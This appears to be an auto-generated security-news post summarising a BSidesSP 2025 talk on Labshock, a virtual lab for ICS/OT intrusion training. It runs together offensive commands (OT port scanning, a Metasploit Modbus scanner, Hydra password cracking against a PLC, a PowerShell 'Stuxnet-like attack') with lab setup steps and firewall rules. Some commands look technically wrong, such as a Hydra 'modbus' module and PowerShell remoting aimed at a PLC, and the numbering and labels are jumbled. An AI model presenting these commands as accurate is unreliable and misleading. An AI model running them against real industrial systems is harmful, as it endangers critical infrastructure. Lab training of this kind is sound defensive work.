Listen to this Post

Industrial Control Systems (ICS) and Operational Technology (OT) security is critical in safeguarding infrastructure from cyber threats. At BSidesSP 2025, Wagner Rodrigues presented “Simulating Chaos in Industrial Environments”, showcasing Labshock—a virtual environment for intrusion testing in industrial networks.
You Should Know:
1. Labshock Overview
Labshock, developed by Zakhar Bernhardt, is a virtual lab designed for ICS/OT security training, simulating real-world industrial environments (SCADA, PLCs, HMIs) for penetration testing and red teaming.
- Key Commands & Tools for ICS Security Testing
Linux-Based ICS Exploitation
Network Scanning (Nmap for OT Protocols) nmap -sU -p 44818,102,502 --script modbus-discover.nse <target_IP> Exploiting Modbus (Using metasploit) msfconsole use auxiliary/scanner/scada/modbus_banner_grabbing set RHOSTS <target_IP> run PLC Password Cracking (Hydra) hydra -L users.txt -P passwords.txt <PLC_IP> modbus
Windows-Based ICS Attacks
Detecting S7Comm Traffic (Wireshark Filter)
s7comm
Simulating a Stuxnet-like Attack (via PowerShell)
Invoke-Command -ComputerName <target_PLC> -ScriptBlock { Stop-Process -Name "Siemens.Simatic" }
3. Setting Up Labshock for Training
Clone Labshock (GitHub) git clone https://github.com/labshock/ics-lab cd ics-lab Build Docker Containers (Simulated PLCs) docker-compose up -d Access the Web Interface firefox http://localhost:8080
4. Defensive Measures
Monitoring OT Traffic (Tshark) tshark -i eth0 -Y "modbus || s7comm || ethernet/ip" -w ot_traffic.pcap Hardening PLCs (Firewall Rules) iptables -A INPUT -p tcp --dport 502 -j DROP Block Modbus iptables -A INPUT -p udp --dport 47808 -j DROP Block CIP
What Undercode Say
Industrial systems are increasingly targeted due to outdated protocols and weak authentication. Tools like Labshock allow security teams to safely simulate attacks and improve defenses. Key takeaways:
– Always segment OT networks from IT.
– Monitor unusual protocol traffic (Modbus, S7Comm).
– Use ICS-aware firewalls (e.g., Nozomi, Claroty).
– Train staff in ICS-specific threats.
Prediction
As AI-driven attacks evolve, ICS systems will face automated exploitation. Future defenses will rely on AI-powered anomaly detection and quantum-resistant cryptography.
Expected Output:
- Labshock GitHub: https://github.com/labshock/ics-lab
- BSidesSP 2025: https://bsidessp.org
- ICS Security Tools: https://github.com/topics/ics-security
References:
Reported By: Wprodrigues Bsidessp – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


